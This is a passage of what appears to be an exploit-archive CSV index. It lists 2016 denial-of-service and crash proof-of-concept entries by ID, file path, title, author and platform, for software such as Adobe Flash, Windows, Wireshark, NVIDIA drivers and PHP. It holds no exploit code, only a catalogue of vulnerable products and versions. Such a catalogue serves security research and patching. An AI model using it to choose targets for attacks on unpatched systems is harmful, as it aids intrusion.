2.21 - Host Address / URL Field (SEH)",2016-05-09,"Tantaryu MING",dos,windows, +39785,exploits/windows/dos/39785.cs,"ASUS Memory Mapping Driver (ASMMAP/ASMMAP64) - Physical Memory Read/Write",2016-05-09,slipstream,dos,windows, +39789,exploits/windows/dos/39789.py,"RPCScan 2.03 - Hostname/IP Field Overwrite (SEH) (PoC)",2016-05-09,"Nipun Jaswal",dos,windows, +39966,exploits/windows/dos/39966.txt,"Blat 3.2.14 - Stack Overflow",2016-06-16,Vishnu,dos,windows, +39795,exploits/windows/dos/39795.pl,"MediaInfo 0.7.61 - Crash (PoC)",2016-05-10,"Mohammad Reza Espargham",dos,windows, +39796,exploits/windows/dos/39796.py,"Ipswitch WS_FTP LE 12.3 - Search field Overwrite (SEH) (PoC)",2016-05-10,"Zahid Adeel",dos,windows, +39797,exploits/win_x86/dos/39797.py,"Core FTP Server 32-bit Build 587 - Heap Overflow",2016-05-10,"Paul Purcell",dos,win_x86,21 +39799,exploits/multiple/dos/39799.txt,"Adobe Reader DC 15.010.20060 - Memory Corruption",2016-05-10,"Pier-Luc Maltais",dos,multiple, +39800,exploits/linux/dos/39800.txt,"Nfdump Nfcapd 1.6.14 - Multiple Vulnerabilities",2016-05-10,Security-Assessment.com,dos,linux, +39801,exploits/android/dos/39801.c,"Google Android Broadcom Wi-Fi Driver - Memory Corruption",2016-05-11,AbdSec,dos,android, +39802,exploits/windows/dos/39802.py,"CIScan 1.00 - Hostname/IP Field Overwrite (SEH) (PoC)",2016-05-11,"Nipun Jaswal",dos,windows, +39812,exploits/multiple/dos/39812.txt,"Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Based Out-of-Bounds Read (2)",2016-05-13,"Google Security Research",dos,multiple, +39819,exploits/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash (PoC) (2)",2016-05-16,HauntIT,dos,windows, +39824,exploits/multiple/dos/39824.txt,"Adobe Flash - JXR Processing Out-of-Bounds Read",2016-05-17,"Google Security Research",dos,multiple, +39825,exploits/multiple/dos/39825.txt,"Adobe Flash - Out-of-Bounds Read when Placing Object",2016-05-17,"Google Security Research",dos,multiple, +39826,exploits/multiple/dos/39826.txt,"Adobe Flash - Overflow in Processing Raw 565 Textures",2016-05-17,"Google Security Research",dos,multiple, +39827,exploits/multiple/dos/39827.txt,"Adobe Flash - Heap Overflow in ATF Processing Image Reading",2016-05-17,"Google Security Research",dos,multiple, +39828,exploits/multiple/dos/39828.txt,"Adobe Flash - '.MP4' Stack Corruption",2016-05-17,"Google Security Research",dos,multiple, +39829,exploits/multiple/dos/39829.txt,"Adobe Flash - Type Confusion in FileReference Constructor",2016-05-17,"Google Security Research",dos,multiple, +39830,exploits/multiple/dos/39830.txt,"Adobe Flash - addProperty Use-After-Free",2016-05-17,"Google Security Research",dos,multiple, +39831,exploits/multiple/dos/39831.txt,"Adobe Flash - SetNative Use-After-Free",2016-05-17,"Google Security Research",dos,multiple, +39832,exploits/windows/dos/39832.txt,"Microsoft Windows - 'gdi32.dll' Multiple 'EMF CREATECOLORSPACEW' Record Handling (MS16-055)",2016-05-17,"Google Security Research",dos,windows, +39833,exploits/windows/dos/39833.txt,"Microsoft Windows - 'gdi32.dll' Multiple 'EMF COMMENT_MULTIFORMATS' Record Handling (MS16-055)",2016-05-17,"Google Security Research",dos,windows, +39834,exploits/multiple/dos/39834.txt,"Microsoft Windows - 'gdi32.dll' Heap Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055)",2016-05-17,"Google Security Research",dos,multiple, +39835,exploits/multiple/dos/39835.txt,"Symantec/Norton AntiVirus - ASPack Remote Heap/Pool Memory Corruption",2016-05-17,"Google Security Research",dos,multiple, +39842,exploits/linux/dos/39842.txt,"4digits 1.1.4 - Local Buffer Overflow",2016-05-19,N_A,dos,linux, +39846,exploits/windows/dos/39846.txt,"Operation Technology ETAP 14.1.0 - Multiple Stack Buffer Overrun Vulnerabilities",2016-05-23,LiquidWorm,dos,windows, +39857,exploits/windows/dos/39857.txt,"Micro Focus Rumba+ 9.4 - Multiple Stack Buffer Overflow Vulnerabilities",2016-05-26,LiquidWorm,dos,windows, +39859,exploits/multiple/dos/39859.txt,"Graphite2 - GlyphCache::GlyphCache Heap Based Buffer Overflow",2016-05-26,"Google Security Research",dos,multiple, +39860,exploits/multiple/dos/39860.txt,"Graphite2 - GlyphCache::Loader Heap Based Overreads",2016-05-26,"Google Security Research",dos,multiple, +39861,exploits/multiple/dos/39861.txt,"Graphite2 - TtfUtil::CheckCmapSubtable12 Heap Based Overread",2016-05-26,"Google Security Research",dos,multiple, +39862,exploits/multiple/dos/39862.txt,"Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap Based Overread",2016-05-26,"Google Security Research",dos,multiple, +39863,exploits/multiple/dos/39863.txt,"Graphite2 - NameTable::getName Multiple Heap Based Out-of-Bounds Reads",2016-05-26,"Google Security Research",dos,multiple, +39867,exploits/multiple/dos/39867.py,"MySQL 5.5.45 - procedure analyse Function Denial of Service",2016-05-30,"Osanda Malith",dos,multiple, +39873,exploits/linux/dos/39873.py,"CCextractor 0.80 - Crash (PoC)",2016-05-31,"David Silveiro",dos,linux, +39875,exploits/linux/dos/39875.py,"TCPDump 4.5.1 - Crash (PoC)",2016-05-31,"David Silveiro",dos,linux, +39877,exploits/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",dos,multiple, +39882,exploits/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",dos,multiple, +39906,exploits/multiple/dos/39906.txt,"Microsoft Word (Windows/OSX) - Crash (PoC)",2016-06-09,halsten,dos,multiple, +39915,exploits/windows/dos/39915.c,"Armadito Antimalware - Backdoor/Bypass",2016-06-10,Ax.,dos,windows, +39920,exploits/osx/dos/39920.c,"Apple Mac OSX Kernel - Null Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext",2016-06-10,"Google Security Research",dos,osx, +39921,exploits/android/dos/39921.txt,"Google Android - '/system/bin/sdcard' Stack Buffer Overflow",2016-06-10,"Google Security Research",dos,android, +39922,exploits/osx/dos/39922.c,"Apple Mac OSX Kernel - Null Pointer Dereference in AppleMuxControl.kext",2016-06-10,"Google Security Research",dos,osx, +39923,exploits/osx/dos/39923.c,"Apple Mac OSX Kernel - Null Pointer Dereference in AppleGraphicsDeviceControl",2016-06-10,"Google Security Research",dos,osx, +39924,exploits/osx/dos/39924.c,"Apple Mac OSX Kernel - NULL Dereference in IOAccelSharedUserClient2::page_off_resource",2016-06-10,"Google Security Research",dos,osx, +39925,exploits/osx/dos/39925.c,"Apple Mac OSX Kernel - NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value",2016-06-10,"Google Security Research",dos,osx, +39926,exploits/osx/dos/39926.c,"Apple Mac OSX Kernel - Null Pointer Dereference in IOAudioEngine",2016-06-10,"Google Security Research",dos,osx, +39927,exploits/osx/dos/39927.c,"Apple Mac OSX Kernel - Out-of-Bounds Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type",2016-06-10,"Google Security Research",dos,osx, +39928,exploits/osx/dos/39928.c,"Apple Mac OSX Kernel - Use-After-Free Due to Bad Locking in IOAcceleratorFamily2",2016-06-10,"Google Security Research",dos,osx, +39929,exploits/multiple/dos/39929.c,"Apple Mac OSX / iOS Kernel - UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient",2016-06-10,"Google Security Research",dos,multiple, +39930,exploits/osx/dos/39930.c,"Apple Mac OSX Kernel - GeForce GPU Driver Stack Buffer Overflow",2016-06-10,"Google Security Research",dos,osx, +39939,exploits/linux/dos/39939.rb,"iSQL 1.0 - 'isql_main.c' Buffer Overflow (PoC)",2016-06-13,HaHwul,dos,linux, +39940,exploits/linux/dos/39940.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap Based Memory Corruption",2016-06-13,"Google Security Research",dos,linux, +39941,exploits/linux/dos/39941.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_DIBSource::TranslateScanline24bpp Out-of-Bounds Read",2016-06-13,"Google Security Research",dos,linux, +39942,exploits/linux/dos/39942.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_WideString::operator= Invalid Read",2016-06-13,"Google Security Research",dos,linux, +39943,exploits/linux/dos/39943.txt,"Foxit PDF Reader 1.0.1.0925 - kdu_core::kdu_codestream::get_subsampling Memory Corruption",2016-06-13,"Google Security Research",dos,linux, +39944,exploits/linux/dos/39944.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_BaseSegmentedArray::IterateIndex Memory Corruption",2016-06-13,"Google Security Research",dos,linux, +39947,exploits/windows/dos/39947.py,"Oracle Orakill.exe 11.2.0 - Buffer Overflow",2016-06-14,hyp3rlinx,dos,windows, +39959,exploits/windows/dos/39959.txt,"Microsoft Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (1)",2016-06-15,"Nils Sommer",dos,windows, +39960,exploits/windows/dos/39960.txt,"Microsoft Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (2)",2016-06-15,"Nils Sommer",dos,windows, +39961,exploits/linux/dos/39961.txt,"Google Chrome - GPU Process MailboxManagerImpl Double-Read",2016-06-15,"Google Security Research",dos,linux, +39986,exploits/linux/dos/39986.py,"Banshee 2.6.2 - '.mp3' Crash (PoC)",2016-06-21,"Ilca Lucian",dos,linux, +39990,exploits/windows/dos/39990.txt,"Microsoft Windows - 'gdi32.dll' Multiple DIB-Related EMF Record Handlers Heap Based Out-of-Bounds Reads/Memory Disclosure (MS16-074)",2016-06-21,"Google Security Research",dos,windows, +39991,exploits/windows/dos/39991.txt,"Microsoft Windows Kernel - 'ATMFD.dll' NamedEscape 0x250C Pool Corruption (MS16-074)",2016-06-21,"Google Security Research",dos,windows, +39993,exploits/win_x86/dos/39993.txt,"Microsoft Windows - Custom Font Disable Policy Bypass",2016-06-21,"Google Security Research",dos,win_x86, +39994,exploits/windows/dos/39994.html,"Microsoft Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063)",2016-06-21,Skylined,dos,windows, +40014,exploits/hardware/dos/40014.txt,"Magnet Networks Tesley CPVA 642 Router - Weak WPA-PSK Passphrase Algorithm",2016-06-27,"Matt O'Connor",dos,hardware, +40031,exploits/multiple/dos/40031.txt,"Symantec AntiVirus - Unpacking RAR Multiple Remote Memory Corruptions",2016-06-29,"Google Security Research",dos,multiple, +40032,exploits/multiple/dos/40032.txt,"Symantec AntiVirus - 'dec2lha Library' Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",dos,multiple, +40034,exploits/multiple/dos/40034.txt,"Symantec AntiVirus - Heap Overflow Modifying MIME Messages",2016-06-29,"Google Security Research",dos,multiple, +40035,exploits/multiple/dos/40035.txt,"Symantec AntiVirus - TNEF Decoder Integer Overflow",2016-06-29,"Google Security Research",dos,multiple, +40036,exploits/multiple/dos/40036.txt,"Symantec AntiVirus - Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink",2016-06-29,"Google Security Research",dos,multiple, +40037,exploits/multiple/dos/40037.txt,"Symantec AntiVirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",dos,multiple, +40038,exploits/windows/dos/40038.py,"Core FTP LE 2.2 - Path Field Local Buffer Overflow",2016-06-29,Netfairy,dos,windows, +40073,exploits/windows/dos/40073.py,"Microsoft Process Kill Utility (kill.exe) 6.3.9600.17298 - Crash (PoC)",2016-07-08,hyp3rlinx,dos,windows, +40074,exploits/windows/dos/40074.txt,"Microsoft WinDbg - 'logviewer.exe' Crash (PoC)",2016-07-08,hyp3rlinx,dos,windows, +40183,exploits/multiple/dos/40183.html,"WebKit - TypedArray.fill Memory Corruption",2016-07-29,"Google Security Research",dos,multiple, +40182,exploits/arm/dos/40182.txt,"Linux ARM/ARM64 - 'perf_event_open()' Arbitrary Memory Read",2016-07-29,"Google Security Research",dos,arm, +40310,exploits/multiple/dos/40310.txt,"Adobe Flash - BitmapData.copyPixels Use-After-Free",2016-08-29,"Google Security Research",dos,multiple, +40181,exploits/linux/dos/40181.c,"AppArmor securityfs < 4.8 - 'aa_fs_seq_hash_show' Reference Count Leak",2016-07-29,"Google Security Research",dos,linux, +40155,exploits/php/dos/40155.py,"PHP 5.5.37/5.6.23/7.0.8 - 'bzread()' Out-of-Bounds Write",2016-07-25,"Hans Jerry Illikainen",dos,php,80 +40184,exploits/multiple/dos/40184.html,"WebKit - TypedArray.copyWithin Memory Corruption",2016-07-29,"Google Security Research",dos,multiple, +40192,exploits/windows/dos/40192.py,"Halliburton LogView Pro 9.7.5 - '.cgm' / '.tif' / '.tiff' / '.tifh' Crash (PoC)",2016-08-01,"Karn Ganeshen",dos,windows, +40194,exploits/multiple/dos/40194.txt,"Wireshark 1.12.0 < 1.12.12 - NDS Dissector Denial of Service",2016-08-03,"Chris Benedict",dos,multiple, +40195,exploits/multiple/dos/40195.txt,"Wireshark 2.0.0 < 2.0.4 - MMSE / WAP / WBXML / WSP Dissectors Denial of Service",2016-08-03,"Antti Levomäki",dos,multiple, +40196,exploits/win_x86-64/dos/40196.txt,"Wireshark 2.0.0 < 2.0.4 - CORBA IDL Dissectors Denial of Service",2016-08-03,Igor,dos,win_x86-64, +40197,exploits/multiple/dos/40197.txt,"Wireshark 1.12.0 < 1.12.12 / 2.0.0 < 2.0.4 - PacketBB Dissector Denial of Service",2016-08-03,"Chris Benedict",dos,multiple, +40198,exploits/multiple/dos/40198.txt,"Wireshark 1.12.0 < 1.12.12 / 2.0.0 < 2.0.4 - WSP Dissector Denial of Service",2016-08-03,"Chris Benedict",dos,multiple, +40199,exploits/multiple/dos/40199.txt,"Wireshark 1.12.0 < 1.12.12 / 2.0.0 < 2.0.4 - RLC Dissector Denial of Service",2016-08-03,"Antti Levomäki",dos,multiple, +40208,exploits/windows/dos/40208.py,"Kodi Web Server 16.1 - Denial of Service",2016-08-05,"Guillaume Kaddouch",dos,windows,8080 +40230,exploits/linux/dos/40230.txt,"SAP SAPCAR - Multiple Vulnerabilities",2016-08-10,"Core Security",dos,linux, +40238,exploits/multiple/dos/40238.txt,"Microsoft Word 2013/2016 - sprmSdyaTop Denial of Service (MS16-099)",2016-08-16,COSIG,dos,multiple, +40243,exploits/osx/dos/40243.html,"Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use-After-Free (PoC)",2013-04-04,"Google Security Research",dos,osx, +40253,exploits/windows/dos/40253.html,"Microsoft Internet Explorer - MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal Read AV",2016-08-16,"Google Security Research",dos,windows, +40255,exploits/windows/dos/40255.txt,"Microsoft Windows - GDI+ DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097)",2016-08-17,"Google Security Research",dos,windows, +40256,exploits/windows/dos/40256.txt,"Microsoft Windows - GDI+ ValidateBitmapInfo Invalid Pointer Arithmetic Out-of-Bounds Reads (MS16-097)",2016-08-17,"Google Security Research",dos,windows, +40257,exploits/windows/dos/40257.txt,"Microsoft Windows - GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",dos,windows, +40308,exploits/multiple/dos/40308.txt,"Adobe Flash - Stage.align Setter Use-After-Free",2016-08-29,"Google Security Research",dos,multiple, +40289,exploits/hardware/dos/40289.txt,"ObiHai ObiPhone 1032/1062 < 5-0-0-3497 - Multiple Vulnerabilities",2016-08-22,"David Tomaschik",dos,hardware, +40291,exploits/linux/dos/40291.txt,"Eye of Gnome 3.10.2 - GMarkup Out of Bounds Write",2016-08-23,"Kaslov Dmitri",dos,linux, +40309,exploits/multiple/dos/40309.txt,"Adobe Flash - Use-After-Free When Returning Rectangle",2016-08-29,"Google Security Research",dos,multiple, +40311,exploits/multiple/dos/40311.txt,"Adobe Flash - MovieClip Transform Getter Use-After-Free",2016-08-29,"Google Security Research",dos,multiple, +40313,exploits/php/dos/40313.php,"PHP 5.0.0 - 'imap_mail()' Local Denial of Service",2016-08-30,"Yakir Wizman",dos,php, +40314,exploits/php/dos/40314.php,"PHP 5.0.0 - 'hw_docbyanchor()' Local Denial of Service",2016-08-30,"Yakir Wizman",dos,php, +40315,exploits/php/dos/40315.php,"PHP 5.0.0 - 'html_doc_file()' Local Denial of Service",2016-08-30,"Yakir Wizman",dos,php, +40316,exploits/php/dos/40316.php,"PHP 5.0.0 - 'snmpwalkoid()' Local Denial of Service",2016-08-31,"Yakir Wizman",dos,php, +40317,exploits/php/dos/40317.php,"PHP 5.0.0 - 'fbird_[p]connect()' Local Denial of Service",2016-08-31,"Yakir Wizman",dos,php, +40318,exploits/php/dos/40318.php,"PHP 5.0.0 - 'snmpwalk()' Local Denial of Service",2016-08-31,"Yakir Wizman",dos,php, +40319,exploits/php/dos/40319.php,"PHP 5.0.0 - 'snmprealwalk()' Local Denial of Service",2016-08-31,"Yakir Wizman",dos,php, +40320,exploits/php/dos/40320.php,"PHP 5.0.0 - 'snmpset()' Local Denial of Service",2016-08-31,"Yakir Wizman",dos,php, +40321,exploits/php/dos/40321.php,"PHP 7.0 - 'AppendIterator::append' Local Denial of Service",2016-08-31,"Yakir Wizman",dos,php, +40329,exploits/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",dos,php, +40439,exploits/windows/dos/40439.py,"VideoLAN VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",dos,windows, +40449,exploits/android/dos/40449.txt,"Google Android - Insufficient Binder Message Verification Pointer Leak",2016-10-03,"Google Security Research",dos,android, +40502,exploits/android/dos/40502.txt,"Google Android - 'gpsOneXtra' Data Files Denial of Service",2016-10-11,"Nightwatch Cybersecurity Research",dos,android, +40508,exploits/windows/dos/40508.txt,"Cisco Webex Player T29.10 - '.WRF' Use-After-Free Memory Corruption",2016-10-12,COSIG,dos,windows, +40509,exploits/windows/dos/40509.txt,"Cisco Webex Player T29.10 - '.ARF' Out-of-Bounds Memory Corruption",2016-10-12,COSIG,dos,windows, +40510,exploits/multiple/dos/40510.txt,"Adobe Flash Player 23.0.0.162 - '.SWF' ConstantPool Critical Memory Corruption",2016-10-12,COSIG,dos,multiple, +40515,exploits/android/dos/40515.txt,"Google Android - Binder Generic ASLR Leak",2016-10-12,"Google Security Research",dos,android, +40524,exploits/osx/dos/40524.py,"VOX Music Player 2.8.8 - '.pls' Denial of Service",2016-10-13,"Antonio Z.",dos,osx, +40536,exploits/windows/dos/40536.py,"Mozilla Firefox 49.0.1 - Denial of Service",2016-10-14,"sultan albalawi",dos,windows, +40570,exploits/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",dos,osx, +40592,exploits/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,dos,windows, +40593,exploits/windows/dos/40593.py,"SAP Adaptive Server Enterprise 16 - Denial of Service",2016-10-20,ERPScan,dos,windows, +40598,exploits/windows/dos/40598.txt,"Microsoft Windows - 'win32k.sys' TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)",2016-10-20,"Google Security Research",dos,windows, +40599,exploits/windows/dos/40599.txt,"Microsoft Windows - 'win32k.sys' TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)",2016-10-20,"Google Security Research",dos,windows, +40600,exploits/windows/dos/40600.txt,"Microsoft Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)",2016-10-20,"Google Security Research",dos,windows, +40601,exploits/windows/dos/40601.txt,"Microsoft Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)",2016-10-20,"Google Security Research",dos,windows, +40603,exploits/windows/dos/40603.html,"Microsoft Edge - 'Function.apply' Information Leak (MS16-119)",2016-10-20,"Google Security Research",dos,windows, +40605,exploits/windows/dos/40605.html,"Microsoft Edge - Spread Operator Stack Overflow (MS16-119)",2016-10-20,"Google Security Research",dos,windows, +40617,exploits/windows/dos/40617.txt,"RealPlayer 18.1.5.705 - '.QCP' Crash (PoC)",2016-10-21,"Alwin Peppels",dos,windows, +40618,exploits/windows/dos/40618.py,"Oracle VM VirtualBox 4.3.28 - '.ovf' Crash (PoC)",2016-10-21,"sultan albalawi",dos,windows, +40632,exploits/windows/dos/40632.py,"SmallFTPd 1.0.3 - 'mkd' Denial of Service",2016-10-26,ScrR1pTK1dd13,dos,windows, +40647,exploits/windows/dos/40647.py,"freeFTPd 1.0.8 - 'mkd' Denial of Service",2016-10-31,ScrR1pTK1dd13,dos,windows, +40648,exploits/windows/dos/40648.txt,"Micro Focus Rumba 9.4 - Local Denial of Service",2016-10-31,"Umit Aksu",dos,windows, +40635,exploits/windows/dos/40635.py,"uSQLite 1.0.0 - Denial of Service",2016-10-27,"Peter Baris",dos,windows, +40638,exploits/windows/dos/40638.py,"CherryTree 0.36.9 - Memory Corruption (PoC)",2016-10-27,n30m1nd,dos,windows, +40649,exploits/windows/dos/40649.html,"Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow",2016-10-31,"Umit Aksu",dos,windows, +40652,exploits/osx/dos/40652.c,"Apple OS X Kernel - IOBluetoothFamily.kext Use-After-Free",2016-10-31,"Google Security Research",dos,osx, +40654,exploits/multiple/dos/40654.txt,"Apple OS X/iOS - 'mach_ports_register' Multiple Memory Safety s",2016-10-31,"Google Security Research",dos,multiple, +40656,exploits/windows/dos/40656.txt,"NVIDIA Driver - Escape Code Leaks Uninitialised ExAllocatePoolWithTag Memory to Userspace",2016-10-31,"Google Security Research",dos,windows, +40657,exploits/windows/dos/40657.txt,"NVIDIA Driver - Unchecked Write to User-Provided Pointer in Escape 0x700010d",2016-10-31,"Google Security Research",dos,windows, +40658,exploits/windows/dos/40658.txt,"NVIDIA Driver - No Bounds Checking in Escape 0x7000194",2016-10-31,"Google Security Research",dos,windows, +40659,exploits/windows/dos/40659.txt,"NVIDIA Driver - Unchecked Write to User-Provided Pointer in Escape 0x600000D",2016-10-31,"Google Security Research",dos,windows, +40661,exploits/windows/dos/40661.txt,"NVIDIA Driver - Escape 0x100010b Missing Bounds Check",2016-10-31,"Google Security Research",dos,windows, +40662,exploits/windows/dos/40662.txt,"NVIDIA Driver - No Bounds Checking in Escape 0x7000170",2016-10-31,"Google Security Research",dos,windows, +40663,exploits/windows/dos/40663.txt,"NVIDIA Driver - Unchecked User-Provided Pointer in Escape 0x5000027",2016-10-31,"Google Security Research",dos,windows, +40664,exploits/windows/dos/40664.txt,"NVIDIA Driver - Incorrect Bounds Check in Escape 0x70001b2",2016-10-31,"Google Security Research",dos,windows, +40665,exploits/windows/dos/40665.txt,"NVIDIA Driver - Missing Bounds Check in Escape 0x100009a",2016-10-31,"Google Security Research",dos,windows, +40666,exploits/windows/dos/40666.txt,"NVIDIA Driver - Missing Bounds Check in Escape 0x70000d5",2016-10-31,"Google Security Research",dos,windows, +40667,exploits/windows/dos/40667.txt,"NVIDIA Driver - Stack Buffer Overflow in Escape 0x7000014",2016-10-31,"Google Security Research",dos,windows, +40668,exploits/windows/dos/40668.txt,"NVIDIA Driver - Stack Buffer Overflow in Escape 0x10000e9",2016-10-31,"Google Security Research",dos,windows, +40685,exploits/windows/dos/40685.html,"Microsoft Internet Explorer 9 - MSHTML CAttrArray Use-After-Free (MS14-056)",2016-11-02,Skylined,dos,windows, +40687,exploits/hardware/dos/40687.txt,"SunellSecurity NVR / Camera - Denial of Service",2016-11-02,qwsj,dos,hardware, +40691,exploits/windows/dos/40691.html,"Microsoft Internet Explorer 11 - MSHTML CView::CalculateImageImmunity Use-After-Free",2016-11-02,Skylined,dos,windows, +40695,exploits/linux/dos/40695.c,"Memcached 1.4.33 - 'Crash' (PoC)",2016-11-01,"p0wd3r / dawu",dos,linux, +40696,exploits/linux/dos/40696.c,"Memcached 1.4.33 - 'Add' (PoC)",2016-11-01,"p0wd3r / dawu",dos,linux, +40697,exploits/linux/dos/40697.c,"Memcached 1.4.33 - 'sasl' (PoC)",2016-11-01,"p0wd3r / dawu",dos,linux, +40699,exploits/windows/dos/40699.txt,"Axessh 4.2 - Denial of Service",2016-11-03,hyp3rlinx,dos,windows, +40703,exploits/windows/dos/40703.pl,"Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service",2016-11-08,"Todor Donev",dos,windows, +40722,exploits/windows/dos/40722.html,"Microsoft Internet Explorer 9 - MSHTML CPtsTextParaclient::CountApes Out-of-Bounds Read",2016-11-07,Skylined,dos,windows, +40731,exploits/linux/dos/40731.c,"Linux Kernel - TCP Related Read Use-After-Free",2016-08-18,"Marco Grassi",dos,linux, +40744,exploits/windows/dos/40744.txt,"Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)",2016-11-09,"laurent gaffie",dos,windows, +40745,exploits/windows/dos/40745.c,"Microsoft Windows Kernel - 'win32k' Denial of Service (MS16-135)",2016-11-09,TinySec,dos,windows, +40747,exploits/windows/dos/40747.html,"Microsoft WININET.dll - 'CHttp­Header­Parser::Parse­Status­Line' Out-of-Bounds Read (MS16-104/MS16-105)",2016-11-10,Skylined,dos,windows, +40748,exploits/windows/dos/40748.html,"Microsoft Internet Explorer 11/10/9 - MSHTML 'PROPERTYDESC::Handle­Style­Component­Property' Out-of-Bounds Read (MS16-104)",2016-11-10,Skylined,dos,windows, +40761,exploits/windows/dos/40761.html,"Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttr­Array::Destroy Use-After-Free",2016-11-15,Skylined,dos,windows, +40762,exploits/linux/dos/40762.c,"Linux Kernel 4.8.0-22/3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",dos,linux, +40766,exploits/windows/dos/40766.txt,"Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)",2016-11-15,"Google Security Research",dos,windows, +40773,exploits/windows/dos/40773.html,"Microsoft Edge - 'eval' Type Confusion",2016-11-17,"Google Security Research",dos,windows, +40787,exploits/windows/dos/40787.html,"Microsoft Edge - 'Array.splice' Heap Overflow",2016-11-18,"Google Security Research",dos,windows, +40779,exploits/windows/dos/40779.py,"Moxa SoftCMS 1.5 - Denial of Service (PoC)",2016-11-18,"Zhou Yu",dos,windows, +40784,exploits/windows/dos/40784.html,"Microsoft Edge - 'FillFromPrototypes' Type Confusion",2016-11-18,"Google Security Research",dos,windows, +40785,exploits/windows/dos/40785.html,"Microsoft Edge - 'Array.filter' Info Leak",2016-11-18,"Google Security Research",dos,windows, +40786,exploits/windows/dos/40786.html,"Microsoft Edge - 'Array.reverse' Overflow",2016-11-18,"Google Security Research",dos,windows, +40790,exploits/linux/dos/40790.txt,"Palo Alto Networks PanOS - appweb3 Stack Buffer Overflow",2016-11-18,"Google Security Research",dos,linux, +40793,exploits/windows/dos/40793.html,"Microsoft Edge Scripting Engine - Memory Corruption (MS16-129)",2016-11-21,Security-Assessment.com,dos,windows, +40797,exploits/windows/dos/40797.html,"Microsoft Edge - 'CText­Extractor::Get­Block­Text' Out-of-Bounds Read (MS16-104)",2016-11-21,Skylined,dos,windows, +40798,exploits/windows/dos/40798.html,"Microsoft Internet Explorer 8 - jscript 'Reg­Exp­Base::FBad­Header' Use-After-Free (MS15-018)",2016-11-21,Skylined,dos,windows, +40806,exploits/linux/dos/40806.py,"NTP 4.2.8p8 - Denial of Service",2016-11-21,"Magnus Klaaborg Stubman",dos,linux, +40814,exploits/hardware/dos/40814.txt,"TP-LINK TDDP - Multiple Vulnerabilities",2016-11-22,"Core Security",dos,hardware,1040 +40815,exploits/windows/dos/40815.html,"Microsoft Internet Explorer 8 - MSHTML 'Ptls5::Ls­Find­Span­Visual­Boundaries' Memory Corruption",2016-11-22,Skylined,dos,windows, +40828,exploits/windows/dos/40828.py,"Core FTP LE 2.2 - 'SSH/SFTP' Remote Buffer Overflow (PoC)",2016-11-27,hyp3rlinx,dos,windows, +40893,exploits/windows/dos/40893.html,"Microsoft Internet Explorer 9 - MSHTML CDisp­Node::Insert­Sibling­Node Use-After-Free (MS13-037) (1)",2016-12-09,Skylined,dos,windows, +40894,exploits/windows/dos/40894.html,"Microsoft Internet Explorer 9 - MSHTML CDisp­Node::Insert­Sibling­Node Use-After-Free (MS13-037) (2)",2016-12-09,Skylined,dos,windows, +40840,exploits/linux/dos/40840.py,"NTP 4.2.8p3 - Denial of Service",2016-11-28,"Magnus Klaaborg Stubman",dos,linux, +40841,exploits/windows/dos/40841.html,"Microsoft Internet Explorer 8 - MSHTML 'SRun­Pointer::Span­Qualifier/Run­Type' Out-Of-Bounds Read (MS15-009)",2016-11-28,Skylined,dos,windows, +40843,exploits/windows/dos/40843.html,"Microsoft Internet Explorer 11 - MSHTML 'CGenerated­Content::Has­Generated­SVGMarker' Type Confusion",2016-11-28,Skylined,dos,windows, +40844,exploits/windows/dos/40844.html,"Microsoft Internet Explorer 10 - MSHTML 'CEdit­Adorner::Detach' Use-After-Free (MS13-047)",2016-11-28,Skylined,dos,windows, +40845,exploits/windows/dos/40845.txt,"Microsoft Internet Explorer 8/9/10/11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,dos,windows, +40866,exploits/linux/dos/40866.py,"NetCat 0.7.1 - Denial of Service",2016-12-05,n30m1nd,dos,linux, 